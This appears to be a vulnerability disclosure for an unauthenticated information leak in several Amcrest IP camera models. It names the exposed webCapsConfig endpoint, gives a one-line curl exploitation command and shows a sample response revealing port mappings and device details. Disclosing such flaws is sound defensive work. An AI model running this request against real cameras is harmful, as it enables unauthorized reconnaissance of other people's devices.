Overview

This report highlights an Information Disclosure vulnerability in multiple AMCREST IPC devices. The vulnerability is demonstrated by a lack of proper access control, allowing sensitive configuration data to be accessed through an unauthenticated HTTP request, affecting over 149,151 devices on the Internet.

Affected Devices

• IP2M-841W
• IPC-IP3M-HX2B
• IPC-IP2M-841B
• IPC-IPM-721S
• IPC-IP3M-943B
• IPC-IP3M-943S
• IP2M-841B

CWE

CWE-200: Information Exposure

Affected Component

URI: http://[IP_address]/web_caps/webCapsConfig

Description: this endpoint returns detailed device information, including the device type, vendor, network configuration (IP addresses and port mappings), system capabilities, and software/plugin versions.

Exploitation

curl -X GET "http://[IP_address]/web_caps/webCapsConfig" -H "Accept: */*"

HTTP response example:

{
  "Anonymous": false,
  "HttpPort": {
     "InnerPort": 80,
     "OuterPort": 8080
  },
  "HttpsPort": {
     "InnerPort": 443,
     "OuterPort": 443
  },
  "RTSPPort": {
     "InnerPort": 554
  },
  "deviceType": "IP2M-841W",
  "eth0": {
     "IPAddress": "",
     "IPv6Address": ""
  },
  "eth2": {
     "IPAddress": "",
     "IPv6Address": ""
  },
  "vendor": "Amcrest",
  ...
}